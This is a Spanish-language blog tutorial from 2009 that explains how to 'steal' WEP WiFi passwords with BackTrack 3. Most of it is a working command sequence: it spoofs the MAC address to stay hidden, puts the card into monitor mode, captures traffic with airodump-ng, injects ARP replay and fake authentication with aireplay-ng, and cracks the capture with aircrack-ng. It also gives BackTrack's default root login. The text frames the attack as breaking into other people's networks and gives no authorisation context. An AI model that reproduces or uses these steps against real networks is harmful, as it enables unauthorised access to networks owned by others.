Está en la página 1de 5

Cómo sacar o "robar" contraseñas WiFi

con Backtrack 3
Felipe | Abril 10, 2009

El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña
con encriptación WEP.

1. Lo primero que debemos hacer es descargar Backtrack 3. Descagar Aquí


2. Luego grabamos la imagen en un CD, para esto podemos utilizar un programa
gratuito como ISO recorder 2.0. Descargar Aquí

3. Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que


arranque BackTrack 3.
4. Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la
esquina inferior izquierda.
5. Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es ath0)
Escribimos: airmon-ng stop ath0

6. Para continuar, cambiamos nuestra MAC (Media Access Control), para ser
“ocultados”.
Escribimos: macchanger -m 11:22:33:44:55:66 ath0
7. Iniciamos nuestra tarjeta de Red en modo Monitor.
Escribimos: airmon-ng start ath0

8. Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y
que la tarjeta esté en modo Monitor.
Escribimos: iwconfig (Aquí sabremos el nombre de nuestra tarjeta, en este
caso ath0)

9. Ahora, a revisar si hay redes cerca nuestro.


Escribimos: airodump-ng ath0

10. Anotemos datos muy importantes de la pantalla anterior, como lo son:


o La MAC de la red (BSSID)
o El canal por donde se transmite la red WiFi (CH)
o El nombre de la red (ESSID)
11. Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
Luego escribimos: airodump-ng –channel X –write XXX ath0
x= Canal (CH)
xxx= Nombre para guardar el archivo con información, pongan cualquier
nombre, en este caso “pass”

Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0

12. Ahora abrimos otra ventana de consola (Shell).


Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0

13. Volvemos a abrir otra ventana de consola (Shell)


Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0

14. Ahora debemos esperar a que se obtenga la información suficiente como para
saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean
altos (más de 50.000).
15. Una vez que tengamos suficiente información (lo sabrás con experiencia,
muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo
que teníamos andando presionando CTRL+C en cada consola (Shell).
16. Luego iniciamos otro programa para que desencripte la contraseña.
Escribimos: Aircrack-ng pass-01.cap

Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.

Aclaraciones: Debido a problemas con mi máquina virtual, no he podido poner mis


propias imágenes, agradezco este tutorial encontrado en Internet. A pesar de que no son
mis imágenes, si he hecho estos pasos pero con una tarjeta Ralink.

En el caso de que pida password para entrar al backtrack:


User : root – Password : toor

Cualquier duda que tengan, escríban aquí, les ayudaremos con todo.
Saludos!

Imágenes sacadas desde: Foro Warez